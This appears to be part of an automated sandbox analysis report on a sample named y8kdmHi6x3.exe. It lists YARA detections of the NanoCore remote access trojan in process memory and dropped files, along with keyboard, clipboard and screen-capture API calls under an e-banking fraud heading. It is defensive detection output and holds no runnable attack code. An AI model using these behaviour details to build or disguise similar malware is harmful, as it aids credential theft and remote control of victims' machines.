            Source: Yara match | File source: Process Memory Space: Synaptics.exe PID: 6632, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: Synaptics.exe PID: 5684, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: Synaptics.exe PID: 4964, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: Synaptics.exe PID: 5976, type: MEMORYSTR
            Source: Yara match | File source: C:\Users\user\Desktop\SYSTEM32.EXE, type: DROPPED
            Source: Yara match | File source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, type: DROPPED
            Source: Yara match | File source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, type: DROPPED
            Source: Yara match | File source: C:\Users\user\Desktop\._cache_Synaptics.exe, type: DROPPED
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_0043C1FC GetKeyboardState, 4_2_0043C1FC
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_004289FC GetClipboardData, CopyEnhMetaFileA, GetEnhMetaFileHeader, 4_2_004289FC
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00429040 GetObjectA, GetDC, CreateCompatibleDC, CreateBitmap, CreateCompatibleBitmap, GetDeviceCaps, GetDeviceCaps, SelectObject, GetDIBColorTable, GetDIBits, SelectObject, CreateDIBSection, GetDIBits, SelectObject, SelectPalette, RealizePalette, FillRect, SetTextColor, SetBkColor, SetDIBColorTable, PatBlt, CreateCompatibleDC, SelectObject, SelectPalette, RealizePalette, SetTextColor, SetBkColor, BitBlt, SelectPalette, SelectObject, DeleteDC, SelectPalette, 4_2_00429040
            Source: ._cache_WINDOWS.EXE, 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: RegisterRawInputDevices

            E-Banking Fraud

            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.29.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.3be31f5.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.584130.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cbff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.4619d96.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cb40a4.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.461ebcc.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.584130.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.3bd9d96.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.45da750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.33.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.584130.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45fff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.59e0000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.44fa750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.4379d96.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.584130.18.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.584130.22.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.._cache_WINDOWS.EXE.43831f5.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.45da750.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.584130.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.59e4629.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46d40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.32.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.461ebcc.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45f40a4.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4bba750.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46dff6c.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4ebff6c.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4dba750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4bba750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000000.406005434.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.401049585.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000000.349954370.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000000.430706138.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.412834234.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000000.415586772.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000000.392435877.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000000.420990382.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000000.356343368.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.439856260.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.431447633.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.561753594.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000000.329629304.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.460036376.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.441301976.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000000.439738650.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.417653653.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.381330192.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.558823372.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.441431426.0000000003711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.400361614.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000000.400197509.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000000.334103669.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.376096056.0000000004331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.436004480.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.459917090.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.406913050.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.374769254.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.459034432.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.441940953.0000000004711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.440103209.0000000003F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.375988189.0000000003331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.381281938.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.439646112.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.405483096.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 5268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 4844, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_y8kdmHi6x3.exe PID: 6232, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WINDOWS.EXE PID: 7016, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_WINDOWS.EXE PID: 6580, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4928, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6632, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_WINDOWS.EXE PID: 6692, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5244, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5976, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, type: DROPPED
            Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\WINDOWS.EXE, type: DROPPED
            Source: Yara matchFile source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_Synaptics.exe, type: DROPPED

            System Summary

            Source: 11.0.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 11.0.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 16.2.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 16.2.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.2.Synaptics.exe.584130.3.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 20.2.Synaptics.exe.584130.3.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 16.0.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 16.0.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 20.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 20.0.Synaptics.exe.584130.29.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 20.0.Synaptics.exe.584130.29.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.584130.22.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 21.0.Synaptics.exe.584130.22.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 21.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 15.2.Synaptics.exe.4dba750.5.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 15.2.Synaptics.exe.4dba750.5.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 11.2.._cache_WINDOWS.EXE.59e0000.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 20.0.Synaptics.exe.584130.17.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 20.0.Synaptics.exe.584130.17.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.2.Synaptics.exe.584130.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 20.2.Synaptics.exe.584130.3.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 20.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 20.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 21.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 9.0.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 9.0.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 11.2.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 11.2.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 8.2.Synaptics.exe.4cb40a4.5.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 8.2.Synaptics.exe.4cb40a4.5.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 19.2.dhcpmon.exe.46231f5.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 23.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 23.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 21.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.584130.22.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 21.0.Synaptics.exe.584130.22.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT, Author: Florian Roth
            Source: 21.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPE, Matched rule: NanoCore, Author: Kevin Breen <kevin@techanarchy.net>
